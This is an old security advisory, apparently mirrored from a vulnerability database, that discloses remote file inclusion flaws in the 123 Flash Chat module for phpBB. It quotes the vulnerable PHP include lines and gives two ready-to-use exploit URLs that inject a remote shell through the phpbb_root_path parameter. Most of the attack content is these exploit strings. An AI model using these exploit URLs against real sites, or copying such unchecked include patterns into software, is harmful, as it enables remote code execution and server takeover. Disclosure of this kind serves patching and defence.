Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19303
HistoryFeb 29, 2008 - 12:00 a.m.

123 Flash Chat Module for phpBB

2008-02-2900:00:00
vulners.com
31

#########################################################################################
Script : 123 Flash Chat Module for phpBB #
Discovered By : F10 #
Contact : [email protected] #
Site : http://by-f10.com #
Greetz : by_emR3 , H0tturk , TaRanTuLa , gsy , ercu_145 , #
LupuS , m0sted , CyberGhost … . #
From : Turkey #
Download : http://php.arsivimiz.com/indir.php?ID=996&sIslem=Indir #
#########################################################################################

The bugs are in :

path/123flashchat.php include($phpbb_root_path . 'extension.inc');
path/123flashchat.php include($phpbb_root_path . 'common.'.$phpEx);
path/phpbb_login_chat.php include($phpbb_root_path . 'extension.inc');
path/phpbb_login_chat.php include($phpbb_root_path . 'common.'.$phpEx);

exploitz :

www.site.com/path/123flashchat.php?phpbb_root_path=[shell]
www.site.com/path/phpbb_login_chat.php?phpbb_root_path=[shell]